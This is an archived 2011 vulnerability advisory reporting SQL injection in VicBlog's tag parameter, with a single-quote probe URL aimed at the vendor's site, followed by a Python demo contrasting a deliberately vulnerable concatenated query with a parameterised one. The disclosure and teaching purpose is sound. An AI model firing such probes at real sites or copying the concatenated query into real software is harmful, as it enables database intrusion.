VicBlog SQL Injection

2011-08-24T00:00:00
ID PACKETSTORM:104402
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-24T00:00:00

Description

                                        
`# Exploit Title: VicBlog SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.vicdesigns.com.au  
# Version: All versions  
# Tested on: All versions are vulnerable  
  
ISSUE  
  
SQL injection is possible through user-supplied input in the request.  
  
Vulnerable Page:  
index.php  
  
Example:  
index.php?page=posts&tag=<SQL Injection Code>  
  
Exploit:  
index.php/1'  
  
POC:  
http://www.vicdesigns.com.au/vicblog/index.php?page=posts&tag=1%27  
  
  
Thanks,  
  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
`
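
The advisory does not show VicBlog's query code, so the following is an added example, not code from the advisory or from VicBlog. It uses an in-memory SQLite table as a stand-in to show why the `tag=1'` probe makes a string-concatenated query fail and how a bound parameter handles the same value. The schema, sample rows and function names are assumptions.

```python
import sqlite3

def make_db():
    """Build an in-memory stand-in for a blog posts table (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, tag TEXT)")
    db.executemany(
        "INSERT INTO posts (title, tag) VALUES (?, ?)",
        # Constructed sample rows, including a legitimate tag with an apostrophe.
        [("First post", "1"), ("Publishing notes", "o'reilly"), ("Misc", "2")],
    )
    return db

def posts_by_tag_concat(db, tag):
    """Vulnerable pattern: the request value is pasted into the SQL text."""
    sql = "SELECT title FROM posts WHERE tag = '" + tag + "'"
    return [row[0] for row in db.execute(sql)]

def posts_by_tag_bound(db, tag):
    """Hardened pattern: the value travels as a bound parameter, never as SQL."""
    rows = db.execute("SELECT title FROM posts WHERE tag = ?", (tag,))
    return [row[0] for row in rows]

def probe(db, tag):
    """Return (concat_result, bound_result); a database error becomes 'error'."""
    try:
        concat = posts_by_tag_concat(db, tag)
    except sqlite3.Error:
        # The stray quote changed the statement's structure, so parsing failed.
        concat = "error"
    return concat, posts_by_tag_bound(db, tag)

if __name__ == "__main__":
    db = make_db()
    # "1'" is the decoded value of the tag parameter in the advisory's POC URL.
    for tag in ["1", "1'", "o'reilly"]:
        print(repr(tag), probe(db, tag))
```

The bound version also returns the correct row for the legitimate tag containing an apostrophe, which the concatenated version cannot serve at all.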